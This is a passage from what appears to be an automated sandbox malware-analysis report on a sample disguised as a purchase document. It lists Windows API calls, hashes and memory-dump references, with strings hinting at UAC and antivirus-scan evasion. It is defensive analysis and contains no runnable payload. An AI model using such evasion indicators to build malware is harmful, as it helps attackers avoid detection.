                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1478290883-0
                                                                                                                                                                                                                          • Opcode ID: 566467167035598960a9aa4e6fea7b2745b7a3bb42487541fa31e889ffbab21b
                                                                                                                                                                                                                          • Instruction ID: 401c5546b03e7ac287ec388b66642f19348bdca534cc7cf9fffcb5614c4529ea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 566467167035598960a9aa4e6fea7b2745b7a3bb42487541fa31e889ffbab21b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C02157F0694310AFEB00F7B4DD02B9DB7EADB05740F9044E0F608E7190DE749905AA1D
                                                                                                                                                                                                                          Function 02B16350 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadStringA.USER32(00000000,00010000,?,00001000), ref: 02B16382
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LoadString
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2948472770-0
                                                                                                                                                                                                                          • Opcode ID: 15b53e0d5145ed84fd5c7cafbd31ebd2320449e067a6ebeb3fc1f24139cbf607
                                                                                                                                                                                                                          • Instruction ID: f732f31b1b6e725ca1a9caa1cd9428848e30afcf4ad28c3bee2a056935fccc7b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15b53e0d5145ed84fd5c7cafbd31ebd2320449e067a6ebeb3fc1f24139cbf607
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDF039717006109BDB11EA9CD8C0B9A73DD9F48355B84C1E1BA98CB359DBA0EC558FA2
                                                                                                                                                                                                                          Function 02B26D6C Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CLSIDFromProgID.OLE32(00000000,?,00000000,02B26DB9,?,?,?,00000000), ref: 02B26D99
                                                                                                                                                                                                                            • Part of subcall function 02B14C60: SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeFromProgString
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4225568880-0
                                                                                                                                                                                                                          • Opcode ID: a8ba14f052f68dc6a97f5c029b4808ed4921915a761b52c31bfeaf625329ede6
                                                                                                                                                                                                                          • Instruction ID: 4a4b92f9f1f1dedc7eb8ea25957ab6f61ee95683d80a25ff4dff7ca629b22b25
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8ba14f052f68dc6a97f5c029b4808ed4921915a761b52c31bfeaf625329ede6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CE0ED7520031CBBE711EB62DC42D8E7BBDDB8A750B9104F1F804A3610EA31AE048860
                                                                                                                                                                                                                          Function 02B15868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B15886
                                                                                                                                                                                                                            • Part of subcall function 02B15ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B10000,02B3E790), ref: 02B15AE8
                                                                                                                                                                                                                            • Part of subcall function 02B15ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B10000,02B3E790), ref: 02B15B06
                                                                                                                                                                                                                            • Part of subcall function 02B15ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B10000,02B3E790), ref: 02B15B24
                                                                                                                                                                                                                            • Part of subcall function 02B15ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B15B42
                                                                                                                                                                                                                            • Part of subcall function 02B15ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B15BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B15B8B
                                                                                                                                                                                                                            • Part of subcall function 02B15ACC: RegQueryValueExA.ADVAPI32(?,02B15D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B15BD1,?,80000001), ref: 02B15BA9
                                                                                                                                                                                                                            • Part of subcall function 02B15ACC: RegCloseKey.ADVAPI32(?,02B15BD8,00000000,?,?,00000000,02B15BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B15BCB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2796650324-0
                                                                                                                                                                                                                          • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                                                                                                                          • Instruction ID: 7c9d9dffa2493a11e4723fb4feeb4da078b4d5d2d69a9d08b4af680170e4844a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBE09271A003148FCB20DE9CC8C0B4633D8AF48750F840AA1ED68CF346D7B0D9608BD0
                                                                                                                                                                                                                          Function 02B17DE0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02B17DF4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                                          • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                                                                                                                          • Instruction ID: d311b245ac91300b6e3f49358a685782d7e933ed16b4da00ed8024326a8731f9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16D05BB63091507AE224965A5D44EA75BDCCFC6770F50067DF558C7180D7208C01C671
                                                                                                                                                                                                                          Function 02B17E80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,?,02B3356F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,Initialize), ref: 02B17E8B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                          • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                                                                                                          • Instruction ID: 632a84800eedb7547e335e22df8e8bc69168021fc75e2a83c2b73d2cf3e45fdf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DC08CF32112010E1E60A9BC1CC425963CD8B842347E01EE1E438CB2C9DB1698663820
                                                                                                                                                                                                                          Function 02B17E5C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,?,02B3041F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,UacInitialize), ref: 02B17E67
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                          • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                                                                                                                          • Instruction ID: d7cffd8e024f7b8f43385001079872a4dbc1099a3c00f1deb60213e392578619
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16C08CE22012000A5A5069BC2CC428952CE8B042383F40AE1A438C72E6DB2298A63850
                                                                                                                                                                                                                          Function 02B14C78 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeString
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3341692771-0
                                                                                                                                                                                                                          • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                                                                                                                          • Instruction ID: b8adcb66bebd1b3e48b5fa80b4c996f08707cfa31f9fb7caba0fef6273ec1ac8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55C012A26102305BEB219AA9ACC0B5262ECDB093A9B9800E1A908DB254E36498008AA0
                                                                                                                                                                                                                          Function 02B3C35C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • timeSetEvent.WINMM(00002710,00000000,02B3C350,00000000,00000001), ref: 02B3C36C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Eventtime
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2982266575-0
                                                                                                                                                                                                                          • Opcode ID: a137e6f06a96d74b7f3f0bdf43336006e5c015fd4fa38c76e488d3fdd41733e3
                                                                                                                                                                                                                          • Instruction ID: 39911893dd863e4479374ed1cf27a7928856dffec38f1e797a8c7f914e773a37
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a137e6f06a96d74b7f3f0bdf43336006e5c015fd4fa38c76e488d3fdd41733e3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CEC092F27D03003AFA1196A55CC2F732A9DD705B14F608592B704FE2C1D2F36C104E68
                                                                                                                                                                                                                          Function 02B14C38 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02B14C3F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocString
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2525500382-0
                                                                                                                                                                                                                          • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                                                                                                                          • Instruction ID: 80e7b4fa2771d971173456c0e5e36c09b9ea44270529d425196c900267da826c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FDB0127421C24116FE5C22620F00773009C8B41386FC800D19F18C80D0FB04C0018835
                                                                                                                                                                                                                          Function 02B14C50 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 02B14C57
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeString
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3341692771-0
                                                                                                                                                                                                                          • Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                                                                                                                          • Instruction ID: 7fab6391d8bb3388698cf6e1a0aeee282a6f682a804cd6c57ff98dd133c6f0ed
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1A011A82002020A8A0A222C002002A2232AFC23003C8C0E80A000A0008A2A8000A8A0
                                                                                                                                                                                                                          Function 02B115CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02B11A03,?,02B12000), ref: 02B115E2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                          • Opcode ID: add1d25e9b06a38976e9739ab60de12cb0c8c68fa94a6485f583b1dc406359c0
                                                                                                                                                                                                                          • Instruction ID: 03fe3878f1d59a8ade3a4162fc87491624ccb50e7479ac0ca99848020e6f1941
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: add1d25e9b06a38976e9739ab60de12cb0c8c68fa94a6485f583b1dc406359c0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AEF04FF0B513004FDB09CFB99A503017BF2E78A388F508579D609DB384E77684028B00
                                                                                                                                                                                                                          Function 02B11682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02B12000), ref: 02B116A4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                          • Opcode ID: e687c5fe1affb83ddd0f8a8948e26b7330121b7f1f5df0ed158d2557d344ef44
                                                                                                                                                                                                                          • Instruction ID: 2fea4167986781ebe706da96ff5ffa9d6f742aa5bbf9454daf73e14205420667
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e687c5fe1affb83ddd0f8a8948e26b7330121b7f1f5df0ed158d2557d344ef44
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2F0BEB2B407956BDB109F6E9C80B82BB98FB003A4F454179FA4CDB340D776A8108BD4
                                                                                                                                                                                                                          Function 02B116E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02B11FE4), ref: 02B11704
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
